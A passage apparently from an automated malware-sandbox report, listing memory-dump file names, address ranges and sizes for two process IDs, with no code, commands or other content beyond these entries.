                                                        6.8MB

                                                      • memory/3852-403-0x00007FFD834E0000-0x00007FFD835FB000-memory.dmp

                                                        Filesize

                                                        1.1MB

                                                      • memory/3852-420-0x00007FFD834E0000-0x00007FFD835FB000-memory.dmp

                                                        Filesize

                                                        1.1MB

                                                      • memory/3852-423-0x00007FFD9F470000-0x00007FFD9F495000-memory.dmp

                                                        Filesize

                                                        148KB

                                                      • memory/3852-107-0x00007FFD83C00000-0x00007FFD83D7F000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                      • memory/3852-432-0x00007FFD983E0000-0x00007FFD983F4000-memory.dmp

                                                        Filesize

                                                        80KB

                                                      • memory/3852-431-0x00007FFD83600000-0x00007FFD836CD000-memory.dmp

                                                        Filesize

                                                        820KB

                                                      • memory/3852-430-0x00007FFD836D0000-0x00007FFD83BF9000-memory.dmp

                                                        Filesize

                                                        5.2MB

                                                      • memory/3852-429-0x00007FFD9D250000-0x00007FFD9D25D000-memory.dmp

                                                        Filesize

                                                        52KB

                                                      • memory/3852-428-0x00007FFD98A00000-0x00007FFD98A19000-memory.dmp

                                                        Filesize

                                                        100KB

                                                      • memory/4460-74-0x0000016AFA2B0000-0x0000016AFA7D8000-memory.dmp

                                                        Filesize

                                                        5.2MB

                                                      • memory/4460-109-0x00007FFD89073000-0x00007FFD89075000-memory.dmp

                                                        Filesize

                                                        8KB

                                                      • memory/4460-12-0x0000016AF7490000-0x0000016AF74A8000-memory.dmp

                                                        Filesize

                                                        96KB

                                                      • memory/4460-11-0x00007FFD89073000-0x00007FFD89075000-memory.dmp

                                                        Filesize

                                                        8KB

                                                      • memory/4460-13-0x0000016AF9AB0000-0x0000016AF9C72000-memory.dmp

                                                        Filesize

                                                        1.8MB

                                                      • memory/4460-42-0x00007FFD89070000-0x00007FFD89B31000-memory.dmp

                                                        Filesize

                                                        10.8MB

                                                      • memory/4460-115-0x00007FFD89070000-0x00007FFD89B31000-memory.dmp

                                                        Filesize

                                                        10.8MB